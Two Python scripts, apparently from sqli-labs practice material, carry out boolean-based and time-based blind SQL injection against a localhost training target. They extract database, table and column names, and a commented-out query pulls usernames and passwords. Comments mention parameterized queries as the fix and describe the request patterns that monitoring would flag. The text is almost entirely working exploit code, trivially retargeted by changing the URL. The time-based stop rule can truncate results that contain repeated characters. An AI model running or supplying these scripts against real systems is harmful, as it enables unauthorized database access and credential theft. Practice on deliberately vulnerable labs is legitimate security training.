import requests as req
# Boolean-based blind extraction script written against the sqli-labs Less-8
# training target on localhost; the page text ("You are in") is the true/false oracle.
# Indentation below is reconstructed from a whitespace-mangled paste.
# Mitigation on the server side is a parameterized query for the id value; the
# injection point these scripts depend on then no longer exists.
url = 'http://127.0.0.1/sqli-labs/Less-8/?id='
res = ''  # characters recovered so far
select = "select database()"  # current database name
# select = "select group_concat(table_name) from information_schema.tables where table_schema='security'"  # table names
select = "select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'"  # column names (this assignment overrides the one above)
# select = "select group_concat(username,0x20,password)from users"  # row contents
for i in range(1, 100):  # position in the result string, 1-based for substr()
    for ascii in range(32, 128):  # candidate byte value 32..127; shadows the builtin ascii()
        # One request per (position, candidate) pair: up to 96 near-identical requests
        # per character, differing only in the id parameter. That volume and shape is
        # what a WAF or request-rate rule sees on the server side.
        id = '1\' and ascii(substr(({}),{},1))={}%23'.format(select, i, ascii)  # query-string tail; shadows the builtin id()
        r = req.get(url+id)  # concatenate and send
        # print(url+id)  # shows the full URL that is sent
        if "You are in" in r.text:  # page body is the oracle
            res += chr(ascii)
            print(res)
            break
        if ascii == 127:  # no candidate matched at this position: the result is complete, stop
            # print('{}'.format(res))
            exit(0)
时间盲注 (time-based blind injection)
import requests as req
import time
# Time-based blind extraction script against sqli-labs Less-9 on localhost; the
# response delay caused by sleep(1) is the oracle instead of page text.
# Indentation below is reconstructed from a whitespace-mangled paste.
url = 'http://127.0.0.1/sqli-labs/Less-9/?id='
res = ''  # characters recovered so far
select = "select database()"  # current database name
# select = "select group_concat(table_name) from information_schema.tables where table_schema='security'"  # table names
# select = "select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'"  # column names
# select = "select group_concat(username,0x20,password)from users"  # row contents
last_attempts = 2  # number of consecutive identical characters that ends the run
attempts = 0  # current run length of identical characters
for i in range(1, 100):  # position in the result string, 1-based for substr()
    low = 32
    high = 127
    while low <= high:  # binary search over the byte value 32..127, at most 7 requests per character
        mid = (low + high) // 2  # bisection midpoint
        id = f"1\' and if(ascii(substr(({select}),{i},1))>{mid},sleep(1),null)%23"  # shadows the builtin id()
        start_time = time.time()
        r = req.get(url + id)  # response body is not inspected; only the elapsed time matters
        end_time = time.time()
        elapsed_time = end_time - start_time
        # A response slower than 0.8 s is read as "sleep(1) ran", i.e. the byte is > mid.
        # Server-side, the signature is a burst of requests to one endpoint where each
        # takes about a second — slow-query and request-timing monitoring surface this.
        if elapsed_time > 0.8:
            low = mid + 1
        else:
            high = mid - 1
    new_char = chr(low)  # the loop ends with low == high + 1; low is taken as the byte value
    res += new_char
    print(res)
    if len(res) >= 2 and res[-1] == res[-2]:  # the new character repeats the previous one
        attempts += 1
        if attempts == last_attempts:  # treated as "past the end of the result": stop
            break
    else:
        attempts = 0